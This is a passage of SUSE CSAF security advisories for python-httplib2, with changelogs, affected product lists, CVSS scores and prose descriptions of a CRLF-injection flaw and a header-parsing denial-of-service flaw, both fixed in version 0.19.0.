same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:58Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:58Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1637-1
Vulnerability from csaf_suse
Published
2021-05-19 11:34
Modified
2021-05-19 11:34
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 contains the following fixes:
Security fixes included in this update:
- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).
Non security fixes included in this update:
- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)
- update to 0.19.0:
* auth: parse headers using pyparsing instead of regexp
* auth: WSSE token needs to be string not bytes
- update to 0.18.1: (bsc#1171998, CVE-2020-11078)
* explicit build-backend workaround for pip build isolation bug
* IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
* Ship test suite in source dist
- Update to 0.17.1
* python3: no_proxy was not checked with https
* feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
* IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects
* proxy: username/password as str compatible with pysocks
* python2: regression in connect() error handling
* add support for password protected certificate files
* feature: Http.close() to clean persistent connections and sensitive data
- Update to 0.14.0:
* Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError
- version update to 0.13.1
0.13.1
* Python3: Use no_proxy
https://github.com/httplib2/httplib2/pull/140
0.13.0
* Allow setting TLS max/min versions
https://github.com/httplib2/httplib2/pull/138
0.12.3
* No changes to library. Distribute py3 wheels.
0.12.1
* Catch socket timeouts and clear dead connection
https://github.com/httplib2/httplib2/issues/18
https://github.com/httplib2/httplib2/pull/111
* Officially support Python 3.7 (package metadata)
https://github.com/httplib2/httplib2/issues/123
0.12.0
* Drop support for Python 3.3
* ca_certs from environment HTTPLIB2_CA_CERTS or certifi
https://github.com/httplib2/httplib2/pull/117
* PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required
https://github.com/httplib2/httplib2/pull/115
* Revert http:443->https workaround
https://github.com/httplib2/httplib2/issues/112
* eliminate connection pool read race
https://github.com/httplib2/httplib2/pull/110
* cache: stronger safename
https://github.com/httplib2/httplib2/pull/101
0.11.3
* No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.
0.11.2
* proxy: py3 NameError basestring
https://github.com/httplib2/httplib2/pull/100
0.11.1
* Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info
https://github.com/httplib2/httplib2/pull/97
0.11.0
* Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5
https://github.com/httplib2/httplib2/pull/91
* python3 proxy support
https://github.com/httplib2/httplib2/pull/90
* If no_proxy environment value ends with comma then proxy is not used
https://github.com/httplib2/httplib2/issues/11
* fix UnicodeDecodeError using socks5 proxy
https://github.com/httplib2/httplib2/pull/64
* Respect NO_PROXY env var in proxy_info_from_url
https://github.com/httplib2/httplib2/pull/58
* NO_PROXY=bar was matching foobar (suffix without dot delimiter)
New behavior matches curl/wget:
- no_proxy=foo.bar will only skip proxy for exact hostname match
- no_proxy=.wild.card will skip proxy for any.subdomains.wild.card
https://github.com/httplib2/httplib2/issues/94
* Bugfix for Content-Encoding: deflate
https://stackoverflow.com/a/22311297
- deleted patches
- Removing certifi patch:
httplib2 started to use certifi and this is already bent to
use system certificate bundle by another patch
Patchnames
SUSE-2021-1637,SUSE-SLE-Module-Public-Cloud-15-2021-1637
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - Removing certifi patch:\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle by another patch\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1637,SUSE-SLE-Module-Public-Cloud-15-2021-1637", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1637-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1637-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211637-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1637-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008783.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-19T11:34:19Z", generator: { date: "2021-05-19T11:34:19Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1637-1", initial_release_date: "2021-05-19T11:34:19Z", revision_history: [ { date: "2021-05-19T11:34:19Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-1.8.1.noarch", product: { name: "python2-httplib2-0.19.0-1.8.1.noarch", product_id: "python2-httplib2-0.19.0-1.8.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-1.8.1.noarch", product: { name: "python3-httplib2-0.19.0-1.8.1.noarch", product_id: "python3-httplib2-0.19.0-1.8.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 15", product: { name: "SUSE Linux Enterprise Module for Public Cloud 15", product_id: "SUSE Linux Enterprise Module for Public Cloud 15", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:15", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-1.8.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15", product_id: "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", }, product_reference: "python3-httplib2-0.19.0-1.8.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 15", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-19T11:34:19Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-19T11:34:19Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1779-1
Vulnerability from csaf_suse
Published
2021-05-27 09:44
Modified
2021-05-27 09:44
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 contains the following fixes:
Security fixes included in this update:
- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).
Non security fixes included in this update:
- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)
- update to 0.19.0:
* auth: parse headers using pyparsing instead of regexp
* auth: WSSE token needs to be string not bytes
- update to 0.18.1: (bsc#1171998, CVE-2020-11078)
* explicit build-backend workaround for pip build isolation bug
* IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
* Ship test suite in source dist
- update to 0.17.3:
* bugfixes
- Update to 0.17.1
* python3: no_proxy was not checked with https
* feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
* IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects
* proxy: username/password as str compatible with pysocks
* python2: regression in connect() error handling
* add support for password protected certificate files
* feature: Http.close() to clean persistent connections and sensitive data
- Update to 0.14.0:
* Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError
- version update to 0.13.1
0.13.1
* Python3: Use no_proxy
https://github.com/httplib2/httplib2/pull/140
0.13.0
* Allow setting TLS max/min versions
https://github.com/httplib2/httplib2/pull/138
0.12.3
* No changes to library. Distribute py3 wheels.
0.12.1
* Catch socket timeouts and clear dead connection
https://github.com/httplib2/httplib2/issues/18
https://github.com/httplib2/httplib2/pull/111
* Officially support Python 3.7 (package metadata)
https://github.com/httplib2/httplib2/issues/123
0.12.0
* Drop support for Python 3.3
* ca_certs from environment HTTPLIB2_CA_CERTS or certifi
https://github.com/httplib2/httplib2/pull/117
* PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required
https://github.com/httplib2/httplib2/pull/115
* Revert http:443->https workaround
https://github.com/httplib2/httplib2/issues/112
* eliminate connection pool read race
https://github.com/httplib2/httplib2/pull/110
* cache: stronger safename
https://github.com/httplib2/httplib2/pull/101
0.11.3
* No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.
0.11.2
* proxy: py3 NameError basestring
https://github.com/httplib2/httplib2/pull/100
0.11.1
* Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info
https://github.com/httplib2/httplib2/pull/97
0.11.0
* Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5
https://github.com/httplib2/httplib2/pull/91
* python3 proxy support
https://github.com/httplib2/httplib2/pull/90
* If no_proxy environment value ends with comma then proxy is not used
https://github.com/httplib2/httplib2/issues/11
* fix UnicodeDecodeError using socks5 proxy
https://github.com/httplib2/httplib2/pull/64
* Respect NO_PROXY env var in proxy_info_from_url
https://github.com/httplib2/httplib2/pull/58
* NO_PROXY=bar was matching foobar (suffix without dot delimiter)
New behavior matches curl/wget:
- no_proxy=foo.bar will only skip proxy for exact hostname match
- no_proxy=.wild.card will skip proxy for any.subdomains.wild.card
https://github.com/httplib2/httplib2/issues/94
* Bugfix for Content-Encoding: deflate
https://stackoverflow.com/a/22311297
- deleted patches
- httplib2 started to use certifi and this is already bent to
use system certificate bundle.
Patchnames
SUSE-2021-1779,SUSE-OpenStack-Cloud-9-2021-1779,SUSE-OpenStack-Cloud-Crowbar-9-2021-1779
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- update to 0.17.3:\n * bugfixes\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - httplib2 started to use certifi and this is already bent to\n use system certificate bundle.\n ", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1779,SUSE-OpenStack-Cloud-9-2021-1779,SUSE-OpenStack-Cloud-Crowbar-9-2021-1779", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1779-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1779-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211779-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1779-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008868.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-27T09:44:14Z", generator: { date: "2021-05-27T09:44:14Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1779-1", initial_release_date: "2021-05-27T09:44:14Z", revision_history: [ { date: "2021-05-27T09:44:14Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-httplib2-0.19.0-8.3.4.noarch", product: { name: "python-httplib2-0.19.0-8.3.4.noarch", product_id: "python-httplib2-0.19.0-8.3.4.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-8.3.4.noarch", product: { name: "python3-httplib2-0.19.0-8.3.4.noarch", product_id: "python3-httplib2-0.19.0-8.3.4.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE OpenStack Cloud 9", product: { name: "SUSE OpenStack Cloud 9", product_id: "SUSE OpenStack Cloud 9", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud:9", }, }, }, { category: "product_name", name: "SUSE OpenStack Cloud Crowbar 9", product: { name: "SUSE OpenStack Cloud Crowbar 9", product_id: "SUSE OpenStack Cloud Crowbar 9", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud-crowbar:9", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-8.3.4.noarch as component of SUSE OpenStack Cloud 9", product_id: "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", }, product_reference: "python-httplib2-0.19.0-8.3.4.noarch", relates_to_product_reference: "SUSE OpenStack Cloud 9", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-8.3.4.noarch as component of SUSE OpenStack Cloud Crowbar 9", product_id: "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", }, product_reference: "python-httplib2-0.19.0-8.3.4.noarch", relates_to_product_reference: "SUSE OpenStack Cloud Crowbar 9", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-27T09:44:14Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which 